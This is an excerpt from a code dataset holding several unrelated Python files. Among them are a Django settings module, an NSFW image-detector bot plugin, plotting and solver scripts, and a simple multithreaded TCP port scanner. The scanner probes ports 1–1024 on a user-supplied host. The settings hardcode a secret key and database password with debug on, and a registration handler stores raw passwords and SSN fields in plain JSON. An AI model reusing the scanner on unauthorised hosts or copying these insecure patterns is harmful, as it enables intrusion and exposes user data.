self.cleaned_data['name']\n try:\n check = data.lower()\n same = Category.objects.get(name = check)\n except:\n return data\n raise ValidationError('This Category is added already')\n \n\nclass AddSubCat(forms.ModelForm):\n \n class Meta:\n model = Sub_Category\n fields = ('sub_name', 'category', 'image')\n widgets = {\n 'sub_name': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Sub Category Name'}),\n 'category': forms.Select(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n 'image': forms.FileInput(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n }\n \n \nclass AddBrand(forms.ModelForm):\n class Meta:\n model = Brand\n fields = ('brand_name', )\n widgets = {\n 'brand_name': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Brand Name'}),\n }\n def clean_brand_name(self):\n data = self.cleaned_data['brand_name']\n try:\n check = data.lower()\n same = Brand.objects.get(brand_name = check)\n except:\n return data\n raise ValidationError('This Brand is added already')","sub_path":"pasal/staff/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513447525","text":"\"\"\"\nPlugin which tries to detect NSFW image URLs.\n\nRequirements:\n\n* Pillow\n* requests\n* jpeg decoder for PIL (libjpeg-dev package on Ubuntu)\n\"\"\"\n\nimport os\nimport uuid\nimport tempfile\nimport regex\nfrom os.path import join as pjoin\n\nimport requests\nfrom PIL import Image\n\nfrom base import BotPlugin\n\n__all__ = ('NSFWImageDetectorPlugin')\n\nIMAGE_EXTENSIONS = [\n '.png',\n '.jpg',\n '.gif',\n]\n\nCHUNK_SIZE = 1024\n\nSKIN_PERCENTAGE_THRESHOLD = 30\n\n\nclass NSFWImageDetectorPlugin(BotPlugin):\n\n name = 'NSFW Image Detector'\n description = ('Scans image URLs for potential NSFW images and warns '\n 'users about them')\n\n def __init__(self, bot):\n super(NSFWImageDetectorPlugin, 
self).__init__(bot=bot)\n self._images_dir = tempfile.mkdtemp(suffix='nsfw-images')\n\n def handle_message(self, channel, nick, msg, line=None):\n urls = regex.WEB_URL.findall(msg)\n\n if not urls:\n return\n\n image_urls = self._get_image_urls(urls)\n\n if not image_urls:\n return\n\n nsfw_image_urls = self._process_images(urls=image_urls)\n\n for url in nsfw_image_urls:\n from response import NSFW_LINKS, random_response\n msg = random_response(NSFW_LINKS) % {'url': url, 'nick': nick}\n self.bot.say(msg, channel)\n\n def _process_images(self, urls):\n \"\"\"\n Download all the images and return links which include potentially NSFW\n content.\n \"\"\"\n nsfw_urls = []\n\n for url in urls:\n file_path = self._download_image(url=url)\n\n if file_path and os.path.isfile(file_path):\n try:\n is_nsfw = self._is_nsfw_image(file_path=file_path)\n\n if is_nsfw:\n nsfw_urls.append(url)\n finally:\n os.remove(file_path)\n\n return nsfw_urls\n\n def _is_nsfw_image(self, file_path):\n \"\"\"\n Detect if the provided image file is NSFW.\n\n Current version of this function is very simple and only detects very\n basic nudity by measuring skin tone percentage in the image.\n \"\"\"\n skin_percent = self._get_skin_ratio_percentage(file_path)\n return skin_percent > SKIN_PERCENTAGE_THRESHOLD\n\n def _get_skin_ratio_percentage(self, file_path):\n try:\n im = Image.open(file_path)\n except Exception:\n self.bot.log_error('Could not open NSFW image: \"'\n + file_path + '\"')\n return 0.0\n\n im = im.convert('RGB')\n\n im = im.crop((int(im.size[0] * 0.2), int(im.size[1] * 0.2),\n im.size[0] - int(im.size[0] * 0.2),\n im.size[1] - int(im.size[1] * 0.2)))\n\n colors = im.getcolors(im.size[0] * im.size[1])\n\n skin = sum(count for count, rgb in colors if rgb[0] > 60\n and rgb[1] < (rgb[0] * 0.85) and rgb[1] < (rgb[0] * 0.70)\n and rgb[1] > (rgb[0] * 0.40) and rgb[1] > (rgb[0] * 0.20))\n\n percentage = float(skin) / float(im.size[0] * im.size[1])\n percentage = percentage * 100\n return 
percentage\n\n def _get_image_urls(self, urls):\n \"\"\"\n Filter urls to returns only image urls.\n\n Contains url transformers for a few common image sharers.\n \"\"\"\n if not urls:\n return\n\n image_urls = []\n for url in urls:\n # Rewrite imgur urls\n imgur_res = regex.IMGUR.search(url)\n if imgur_res:\n url = \"https://i.imgur.com/\" + imgur_res.group('id') + \".jpg\"\n\n if self._is_image_url(url=url):\n image_urls.append(url)\n\n return image_urls\n\n @staticmethod\n def _is_image_url(url):\n # Very simple logic, doesn't support urls which don't have an extension\n url = url.lower()\n extension = os.path.splitext(url)[1]\n\n return extension in IMAGE_EXTENSIONS\n\n def _download_image(self, url):\n \"\"\"Download image in a temporary directory and return its path.\"\"\"\n try:\n extension = os.path.splitext(url)[1]\n response = requests.get(url, stream=True)\n except Exception:\n self.bot.log_error('Failed to download NSFW image: \"'\n + url + '\"')\n return\n\n if not response.status_code == 200:\n return\n\n name = str(uuid.uuid4()) + extension\n file_path = pjoin(self._images_dir, name)\n\n first_chunk = True\n with open(file_path, 'wb') as fp:\n for chunk in response.iter_content(CHUNK_SIZE):\n if first_chunk:\n first_chunk = False\n if not self._is_image(chunk):\n self.bot.log_error('NSFW image was not an image: \"'\n + url + '\"')\n return\n\n fp.write(chunk)\n\n return file_path\n\n # From http://people.iola.dk/olau/python/imagedetect.py by Ole Laursen\n @staticmethod\n def _is_jpg(data):\n \"\"\"Return True if data is the first 2 bytes of a JPEG file.\"\"\"\n return data[:2] == '\\xff\\xd8'\n\n @staticmethod\n def _is_png(data):\n \"\"\"Return True if data is the first 8 bytes of a PNG file.\"\"\"\n return data[:8] == '\\x89PNG\\x0d\\x0a\\x1a\\x0a'\n\n @staticmethod\n def _is_gif(data):\n \"\"\"Return True if data is the first 4 bytes of a GIF file.\"\"\"\n return data[:4] == 'GIF8'\n\n def _is_image(self, data):\n \"\"\"Return True if data 
conforms to a magic number of an image file.\"\"\"\n return self._is_jpg(data) or self._is_png(data) or self._is_gif(data)\n","sub_path":"src/plugins/nsfw_image_detector.py","file_name":"nsfw_image_detector.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"189988406","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 22 20:37:58 2019\n\n@author: billy\n\"\"\"\n\nimport numpy as np\n\nimport plots\n\nfrom NumericalSolvers import RK,EF,TZ\n\n\nprint('------ begin of code ------')\n\n\n## boundary conditions\n\n# time starting point \nt0=0\n\n#time ending point\ntE=365\n\n#step time\ndt=0.1\n\n\n# initial conditions\n\n#creating the initial w matrix\n\nw0=np.block([\n [0.12],\n [0.001],\n ])\n\n\n\n## the first step \n## the starting point for the total data matrix w\nw=w0\n\n## the starting point for the time vector Time\nTime=[t0]\n\n\n##----------- The excecution --------------\nwhile(Time[-1]', self.btn_func)\n bu.pack(side=tk.LEFT)\n self.buframe.pack(side=tk.TOP)\n self.flagframe = tk.LabelFrame(self,text='')\n j = -1\n for flag in self.flags :\n self.fVar.append(tk.IntVar())\n j += 1\n self.fVar[j].set(fVal[j])\n fl = tk.Checkbutton(self.flagframe,text=flag, variable=self.fVar[j])\n self.fBtn.append(fl)\n if fVis[j] : fl.pack(side=tk.LEFT)\n self.flagframe.pack(side=tk.TOP)\n self.transient(self.master)\n self.wait_visibility()\n self.grab_set()\n self.focus_set()\n\n def btn_func(self,event):\n btn = event.widget\n r = btn['text'] + ';' + str(self.fVar[0].get()) + ';' + str(self.fVar[1].get())\n self.var.set(r)\n self.destroy()\n\n\ndef ask_dir_content(dir):\n if dir[-1] != '/': dir = dir + '/'\n dir_cnt =0\n file_cnt =0\n files = os.listdir(dir)\n for f in files:\n #print(dir+f)\n if os.path.isdir(dir + f):\n dir_cnt += 1\n else:\n file_cnt += 1\n if dir_cnt + file_cnt == 0:\n return 'empty'\n else:\n return 'Dir/File: 
'+str(dir_cnt)+'/'+str(file_cnt)\n\ndef get_askbox_result(win,var,qtext,butt):\n AskBox = AskBoxM(master=win, bg='blue', qt=qtext, var=var, btns=butt)\n AskBox.geometry('400x120+150+100')\n AskBox.wait_window()\n r = var.get()\n return r\n\ndef get_askbox_answer(win,var,qtext,butt,bg='blue'):\n AskBox = AskBoxM(master=win, bg=bg, qt=qtext, var=var, btns=butt)\n wx = win.winfo_rootx()+20\n wy = win.winfo_rooty()+70\n AskBox.geometry('400x120+{}+{}'.format(wx,wy))\n AskBox.wait_window()\n r = var.get()\n return r\n\ndef ask_confirm(win,var,qtext):\n AskBox = AskBoxM(master=win, bg='blue', qt=qtext,\n var=var, btns=['Yes','No'], fVis=(False,False))\n wx = win.winfo_rootx()+20\n wy = win.winfo_rooty()+70\n AskBox.geometry('400x100+{}+{}'.format(wx,wy))\n AskBox.title('Confirm')\n AskBox.wait_window()\n r = var.get()\n ans,mult,trash = r.split(';')\n return ans\n\ndef show_info(win,qtext):\n var = tk.StringVar()\n AskBox = AskBoxM(master=win, bg='blue', qt=qtext, var=var,\n btns=['OK'], fVis=(False,False))\n wx = win.winfo_rootx()+20\n wy = win.winfo_rooty()+70\n AskBox.geometry('400x100+{}+{}'.format(wx,wy))\n AskBox.title('Info')\n AskBox.wait_window()\n return 'OK'\n\n\nif __name__ == '__main__':\n\n mainW = 800\n mainH = 300\n smX = 100\n smY = 30\n main_geo = ('{}x{}+{}+{}'.format(mainW, mainH,smX,smY))\n\n root = tk.Tk()\n root.geometry(main_geo)\n root.title('AskBoxM Testing')\n SomeVar = tk.StringVar()\n\n fgroup = ['file01','file02','file03','file04','file05','file06','file07',\n 'file08','file09','file10']\n\n def ask():\n global SomeVar\n qt = qText.get('1.0',tk.END)\n r = get_askbox_result(root,SomeVar,qt,['Yes','Cancel'])\n print('r=',r)\n\n def imitate_filegroup_deleting():\n global SomeVar, fgroup\n fg = fgroup\n max = len(fg)\n j = 0\n ask_flag = True\n for fn in fg:\n j += 1\n cnt = 'Cnt : '+str(j)+' / '+str(max)\n qt = cnt + '\\nУдалить файл \"'+fn+'\" ?'\n if ask_flag :\n Ab = AskBoxM(master=root, bg='blue', qt=qt, var=SomeVar,\n btns=['Yes', 'No', 
'Skip', 'Cancel'],\n fVis=(True, True), fVal=(0, 1))\n Ab.geometry('350x100+150+100')\n Ab.wait_window()\n r = SomeVar.get()\n print('r=', r)\n cmd, noask, trash = r.split(';')\n print(cmd, noask, trash)\n noask = int(noask)\n trash = int(trash)\n if noask : ask_flag =False\n else :\n print(cnt, fn)\n\n\n qText = tk.Text(root, fg='black', height=6)\n qText.insert(tk.INSERT, 'Удалить указанный файл ?')\n qText.pack_propagate(False)\n qText.pack(side=tk.TOP, fill=tk.X)\n bu = tk.Button(root,text='Ask',command=ask).pack()\n buDel = tk.Button(root,text='GroupDelete', command=imitate_filegroup_deleting).pack()\n\n root.mainloop()\n\n\n\n","sub_path":"AskBox.py","file_name":"AskBox.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"287137905","text":"from matplotlib import cm, rcParams\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math as math\nimport random as rand\nimport os\nimport csv\nimport argparse\n\n# TO DO : Rewrite this code to make it more readable.\n# USAGE : Run in terminal \"python auto_to_py.py bif_points_1.dat bif_points_2.dat bif_points_3.dat\"\n\nplt.rcParams['axes.xmargin'] = 0\n\np = argparse.ArgumentParser()\np.add_argument('files', type=str, nargs='*')\nargs = p.parse_args()\n\ndef row_count(filename):\n with open(filename) as in_file:\n return sum(1 for _ in in_file)\n\nc = ['#B5EAD7', '#C7CEEA']\ns = ['-', '--']\n\nI = [[]]\nphi = [[]]\nstability = []\n\nfor filename in args.files :\n with open(filename, newline='') as file:\n datareader = csv.reader(file, delimiter=' ')\n\n last_line_nb = row_count(filename)\n\n last_I = -999\n last_phi = -999\n last_stability = 0\n\n # seperate into sublists by checking if two consecutive values are duplicates\n for row in datareader:\n\n # the 2nd condition avoids a list with one value when two consecutive values are duplicates\n if last_I == float(row[0]) and len(I[-1]) > 1 :\n if last_stability 
!= int(row[3]):\n I[-1].append(last_I)\n phi[-1].append(last_phi)\n I.append([])\n phi.append([])\n if last_stability != 0 :\n stability.append(last_stability)\n\n if last_I != -999 :\n I[-1].append(last_I)\n phi[-1].append(last_phi)\n\n if last_stability != int(row[3]) and len(I[-1]) > 1:\n I.append([])\n phi.append([])\n if last_stability != 0 :\n stability.append(last_stability)\n\n # if at last line, then stop checking for consecutive values and just add the remaining data\n if last_line_nb == datareader.line_num:\n I[-1].append(float(row[0]))\n phi[-1].append(float(row[1]))\n stability.append(int(row[3]))\n\n last_I = float(row[0])\n last_phi = float(row[1])\n last_stability = int(row[3])\n\n# regime delimiter to make things more visual\nplt.axvspan(1, 1.25925, facecolor='0.2', alpha=0.1)\n\nfor k in range(len(I)) :\n if stability[k] == 1 :\n plt.plot(I[k], phi[k], color='black', linestyle=s[stability[k]-1], label='stable')\n if stability[k] == 2 :\n plt.plot(I[k], phi[k], color='black', linestyle=s[stability[k]-1], label='unstable')\n\nplt.title('Bifurcation diagram for two weakly coupled neurons, $\\\\beta =0.2$', fontsize=11)\nplt.xlabel('Current $I$', fontsize=10.5)\nplt.ylabel('Phase Difference $\\phi$', fontsize=10.5)\n\n# remove duplicate legend\nhandles, labels = plt.gca().get_legend_handles_labels()\nby_label = dict(zip(labels, handles))\nplt.legend(by_label.values(), by_label.keys(), loc='upper right', bbox_to_anchor=(1, 0.95))\n\nplt.savefig('bif_diagram_beta=0.2.svg')\n#plt.show()\n","sub_path":"bif_weak_coupling/beta=0.2/auto_to_py.py","file_name":"auto_to_py.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"400763633","text":"#!/usr/bin/env python\r\nimport socket\r\nimport subprocess\r\nimport sys\r\nimport netaddr\r\nfrom datetime import datetime\r\nfrom multiprocessing.dummy import Pool as ThreadPool\r\n\r\n# Ask for input\r\nremoteServer = 
input(\"Enter a remote host to scan: \")\r\nremoteServerIP = socket.gethostbyname(remoteServer)\r\n\r\n# Make the Pool of workers\r\npool = ThreadPool(512)\r\n\r\n# Print a nice banner with information on which host we are about to scan\r\nprint (\"-\" * 60)\r\nprint (\"Please wait, scanning remote host\", remoteServerIP)\r\nprint (\"-\" * 60)\r\n\r\n# Check what time the scan started\r\nt1 = datetime.now()\r\n\r\n\r\n\r\n# Using the range function to specify ports (here it will scans all ports between 1 and 1024)\r\n\r\n# We also put in some error handling for catching errors\r\n\r\ndef pscan(port):\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n result = sock.connect_ex((remoteServerIP, port))\r\n if result == 0:\r\n print (\"Port {}: \t Open\".format(port))\r\n sock.close()\r\n return\r\n\r\nresults = pool.map(pscan,range(1,1025))\r\n\r\n\r\n#excepts\r\n\r\n# Checking the time again\r\nt2 = datetime.now()\r\n\r\n# Calculates the difference of time, to see how long it took to run the script\r\ntotal = t2 - t1\r\n\r\n# Printing the information to screen\r\nprint ('Scanning Completed in: ', total)\r\n","sub_path":"portscanner_multi.py","file_name":"portscanner_multi.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"62782512","text":"import os\nimport datetime\nfrom pathlib import Path\nfrom celery.schedules import crontab\n# from environ import Env\n\n# Build paths inside the project like this: BASE_DIR / 'subdir'.\n# ENV = Env()\n# TEMP_DIRECTORY = \"/tmp\"\n# BASE_DIR = Path(__file__).resolve().parent.parent\nSITE_URL = \"http://localhost:8000\"\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'qcss(9#e6wch%rq2zk8i89d3y=h9-#gt@b@g=69zzj#q_pf!(k'\n\n# SECURITY WARNING: don't run 
with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS=['*']\n\nMINIMUM_RESOLUTIONS_TO_ENCODE = [240, 360]\n# FFMPEG_PATH = 'ffmpeg'\n# FFMPEG_PATH = ENV.str(\"FFMPEG_PATH\", \"ffmpeg\")\n# FFPROBE_PATH = ENV.str(\"FFPROBE_PATH\", \"ffprobe\")\n\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_CREDENTIALS = True\n\n# AUTH_USER_MODEL = 'authentication.User'\nAUTH_USER_MODEL = 'users.User'\n# Application definition\n\nLIKES_MODELS = {\n \"posts.Post\": {\n 'serializer': 'posts.serializers.PostSerializer'\n },\n \"albums.Album\": {\n 'serializer': 'albums.serializers.AlbumsSerializer'\n },\n \"tracks.Track\": {\n 'serializer': 'tracks.serializers.TrackSerializer'\n },\n}\n\nLOCAL_APPS = [\n # 'authentication',\n # 'auth',\n 'users',\n 'posts',\n 'videos',\n 'photos',\n 'likes',\n 'comments',\n 'artists',\n 'tracks',\n 'playlists',\n 'albums',\n 'images',\n\n 'uploader',\n # 'media',\n 'encoding',\n 'litloop_project',\n # 'videos.apps.VideosConfig',\n 'actions.apps.ActionsConfig',\n # 'uploader.apps.UploaderConfig',\n\n # 'authentication.apps.AuthenticationConfig',\n # 'users.apps.UsersConfig',\n # 'posts.apps.PostsConfig',\n # 'likes.apps.LikesConfig',\n # 'tracks.apps.TracksConfig',\n # 'albums.apps.AlbumsConfig',\n # 'artists.apps.ArtistsConfig',\n # 'images.apps.ImagesConfig',\n # 'uploader.apps.UploaderConfig',\n # 'media.apps.MediaConfig',\n]\n\nTHIRD_PARTY_APPS = [\n # \"allauth\",\n # \"allauth.account\",\n # \"allauth.socialaccount\",\n 'rest_framework',\n 'corsheaders',\n 'django_extensions',\n 'drf_yasg',\n 'mptt',\n 'spotipy',\n]\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n *THIRD_PARTY_APPS,\n *LOCAL_APPS,\n\n]\n\nSITE_ID = 1\n\nSWAGGER_SETTINGS = {\n 'SECURITY_DEFINITIONS': {\n 'Bearer': {\n 'type': 'apiKey',\n 'name': 'Authorization',\n 'in': 'header',\n }\n 
}\n}\n\n\n\nMIDDLEWARE = [\n # 'litloop_project.CorsMiddleware',\n # 'litloop_project.middleware.cors.CorsMiddleware',\n 'litloop_project.middleware.corss.CorsMiddleware',\n\n # 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n # 'corsheaders.middleware.CorsMiddleware',\n]\n\nROOT_URLCONF = 'litloop_project.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # 'DIRS': [],\n # 'DIRS': [\n # BASE_DIR + '/templates/',\n # ],\n \"DIRS\": [\"templates\"],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'litloop_project.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'postgres',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n 'HOST': '127.0.0.1',\n 'PORT': '5432'\n }\n}\n\n\nMEDIA_IS_REVIEWED = True\nPORTAL_WORKFLOW = \"private\"\n\nREST_FRAMEWORK = {\n 'NON_FIELD_ERRORS_KEY': 'error',\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n 'DEFAULT_RENDERER_CLASSES': [\n 'rest_framework.renderers.JSONRenderer',\n 'rest_framework.renderers.BrowsableAPIRenderer',\n ],\n # 'DEFAULT_PARSER_CLASSES': (\n # 'rest_framework.parsers.JSONParser',\n # )\n # 'DEFAULT_PAGINATION_CLASS':\n # 'tracks.pagination.CustomPagination'\n # 
'artcograph_dev.apps.tracks.pagination.CustomPagination'\n}\n\n# REST_FRAMEWORK = {\n# 'DEFAULT_PAGINATION_CLASS':\n# '.pagination.CustomPagination'\n# }\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': datetime.timedelta(days=365),\n 'REFRESH_TOKEN_LIFETIME': datetime.timedelta(days=1),\n}\n\n# Password validation\n# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators\n\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nDEFAULT_AUTO_FIELD='django.db.models.AutoField'\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.1/howto/static-files/\n\nSTATIC_URL = '/static/'\nFRIENDLY_TOKEN_LEN = 11\nFRIENDLY_COMMENT_TOKEN_LEN = 26\n\n\n\nMASK_IPS_FOR_ACTIONS = True\n# how many seconds a process in running state without reporting progress is\n# considered as stale...unfortunately v9 seems to not include time\n# some times so raising this high\nRUNNING_STATE_STALE = 60 * 60 * 2\n\n# FRIENDLY_TOKEN_LEN = 9\n\nX_FRAME_OPTIONS = \"ALLOWALL\"\n\n\nEMAIL_BACKEND = \"djcelery_email.backends.CeleryEmailBackend\"\nCELERY_EMAIL_TASK_CONFIG = {\n \"queue\": \"short_tasks\",\n}\n\nPOST_UPLOAD_AUTHOR_MESSAGE_UNLISTED_NO_COMMENTARY = \"\"\n# a message to be shown on the author of a media file and only\n# only in case where unlisted workflow is used and no commentary\n# exists\n\nCANNOT_ADD_MEDIA_MESSAGE = \"\"\n\n# mp4hls command, part of Bendo4\nMP4HLS_COMMAND = 
\"/home/mediacms.io/mediacms/Bento4-SDK-1-6-0-637.x86_64-unknown-linux/bin/mp4hls\"\n\n\n# EMAIL_BACKEND = 'django.core.email.backends.smtp.EmailBackend'\nEMAIL_USE_TLS = True\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = 587\nEMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD')\n\n\nREDIS_LOCATION = \"redis://127.0.0.1:6379/1\"\n# CELERY_RESULT_BACKEND = 'redis://localhost:6379'\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": REDIS_LOCATION,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n },\n }\n}\n\nREDIS_CACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.redis.RedisCache\",\n \"LOCATION\": \"redis://127.0.0.1:6379\",\n }\n}\n\nSESSION_ENGINE = \"django.contrib.sessions.backends.cache\"\nSESSION_CACHE_ALIAS = \"default\"\n\n\n# TODO: beat, delete chunks from media root\n# chunks_dir after xx days...(also uploads_dir)\n\n\nLOCAL_INSTALL = False\n\n# this is an option to make the whole portal available to logged in users only\n# it is placed here so it can be overrided on local_settings.py\nGLOBAL_LOGIN_REQUIRED = False\n\n# TODO: separate settings on production/development more properly, for now\n# this should be ok\nCELERY_TASK_ALWAYS_EAGER = False\nif os.environ.get(\"TESTING\"):\n CELERY_TASK_ALWAYS_EAGER = True\n\n\n# OAuth PROVIDERS\n# GOOGLE_CLIENT_ID =\n# GOOGLE_CLIENT_SECRET =\n#\n# APPLE_CLIENT_ID =\n# APPLE_CLIENT_SECRET =\n#\n# TWITTER_CLIENT_ID =\n# TWITTER_CLIENT_SECRET =\n#\n# SPOTIFY_CLIENT_ID =\n# SPOTIFY_CLIENT_SECRET =\n#\n\n\nfrom litloop_project.settings.aws import * # noqa\nfrom litloop_project.settings.celery import * # noqa\nfrom litloop_project.settings.email import * # noqa\nfrom litloop_project.settings.ffmpeg import * # noqa\nfrom litloop_project.settings.session import * # 
noqa\n","sub_path":"litloop_project/django/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"532583829","text":"# 제곱근 사용을 위한 sqrt 함수\nfrom math import sqrt\n\n\n# 두 매장의 직선 거리를 계산해 주는 함수\ndef distance(store1, store2):\n return sqrt((store1[0] - store2[0]) ** 2 + (store1[1] - store2[1]) ** 2)\n\n\n# 가장 가까운 두 매장을 찾아주는 함수\ndef closest_pair(coordinates):\n # 여기 코드를 쓰세요\n shortest = distance(coordinates[0], coordinates[1])\n for pair1 in coordinates:\n for pair2 in coordinates:\n if pair1 == pair2:\n continue\n if shortest > distance(pair1, pair2):\n shortest = distance(pair1, pair2)\n temp1 = pair1\n temp2 = pair2\n answer = [temp1, temp2]\n return answer\n\n\n# 테스트\ntest_coordinates = [(2, 3), (12, 30), (40, 50), (5, 1), (12, 10), (3, 4)]\nprint(closest_pair(test_coordinates))\n","sub_path":"codeit/closest_pair/closest_pair.py","file_name":"closest_pair.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"46513370","text":"def post(self):\n post_keys = ['user_first',\n 'user_last',\n 'user_middle',\n 'user_dob',\n 'user_rep_id',\n 'user_email',\n 'user_phone',\n 'user_postal',\n 'user_address',\n 'user_city',\n 'user_state',\n 'user_identification_type',\n 'dl_state',\n 'identification_expiration',\n 'user_identification_number',\n 'user_password',\n 'user_password_confirm',\n 'user_ss',\n 'user_primary_state',\n 'user_status',\n 'user_business',\n 'user_business_type',\n 'user_business_tax',\n 'user_business_ein',\n 'user_office',\n 'user_type',\n 'confirm_code',\n 'recruiter_rep_id',\n 'comp_path',\n 'user-signature']\n\n new_pending_user = {}\n for item in post_keys:\n new_pending_user[item] = self.request.get(item)\n new_pending_user[\"identifier\"] = Helpers.guid()\n self.response.out.write(\"registering\")\n kv = KeyValueStoreItem(\n 
identifier=Helpers.guid(),\n keyy=\"new_user_registration_\" + new_pending_user[\"identifier\"],\n val=json.dumps(new_pending_user),\n expiration=Helpers.pacific_now() + timedelta(days=7)\n )\n kv.put()\n self.redirect(\"/sign/\" + new_pending_user[\"identifier\"])\n return\n\n import StringIO\n from PIL import Image, ImageDraw, ImageFont\n from io import BytesIO\n from PyPDF2 import PdfFileWriter,PdfFileReader\n import base64\n\n #validate the form\n good = True\n if self.request.get(\"user_password\") != self.request.get(\"user_password_confirm\"):\n good = False\n if len(self.request.get(\"user_password\").strip()) < 3:\n good = False\n if self.request.get(\"user_office\") == \"N/A\" or self.request.get(\"user_office\").strip() == \"\":\n good = False\n if self.request.get(\"user_type\") == \"N/A\" or self.request.get(\"user_type\").strip() == \"\":\n good = False\n\n if good:\n email = self.request.get(\"user_email\").lower()\n user_rep_id = self.request.get(\"user_rep_id\").upper()\n new_id = Helpers.guid()\n\n found_users_email = False\n reps = FieldApplicationUser.query(FieldApplicationUser.rep_email == email)\n for rep in reps:\n found_users_email = True\n if found_users_email:\n self.response.out.write(\"User already exists.\")\n else:\n found_users_rep_id = False\n reps2 = FieldApplicationUser.query(FieldApplicationUser.rep_id == user_rep_id)\n ascii_offset = -1\n for rep2 in reps2:\n found_users_rep_id = True\n ascii_offset += 1\n\n if found_users_rep_id:\n user_rep_id += chr(ascii_offset + 65)\n\n allowed_offises = []\n new_user = FieldApplicationUser(\n identifier=new_id,\n first_name=(self.request.get(\"user_first\")[0].upper() + self.request.get(\"user_first\")[1:]).strip(),\n last_name=(self.request.get(\"user_last\")[0].upper() + self.request.get(\"user_last\")[1:]).strip(),\n main_office=self.request.get(\"user_office\"),\n rep_id=user_rep_id,\n rep_email=email,\n rep_phone=self.request.get(\"user_phone\"),\n 
user_type=self.request.get(\"user_type\"),\n password=Helpers.hash_pass(self.request.get(\"user_password\")),\n payscale_key=\"n/a\",\n sales_rabbit_id=-1,\n current_status=-1,\n recruiter_rep_id=self.request.get(\"recruiter_rep_id\"),\n automatic_override_designee=self.request.get(\"recruiter_rep_id\"),\n automatic_override_amount=10.0,\n automatic_override_enabled=True\n )\n\n recruiter_rep_id = new_user.recruiter_rep_id\n #exceptions for the Shaffer's\n if new_user.recruiter_rep_id in [\"SHAF0420\", \"SHAF1021\", \"SHAF0920\"]:\n new_user.recruiter_rep_id = \"AZ0230\"\n new_user.automatic_override_designee = \"AZ0230\"\n new_user.automatic_override_amount = 0.0\n new_user.automatic_override_enabled=False\n\n if new_user.recruiter_rep_id in [\"VAND0127\", \"COLL0910\"]:\n new_user.automatic_override_amount = 0.0\n new_user.automatic_override_enabled=False\n\n user_type = new_user.user_type\n count = 0\n while count < int(new_user.user_type == \"survey\"):\n allowed_offises.append(new_user.main_office)\n count +=1\n\n new_user.allowed_offices = json.dumps(allowed_offises)\n\n today = Helpers.pacific_today()\n yr = str(today.year)\n mth = str(today.month)\n 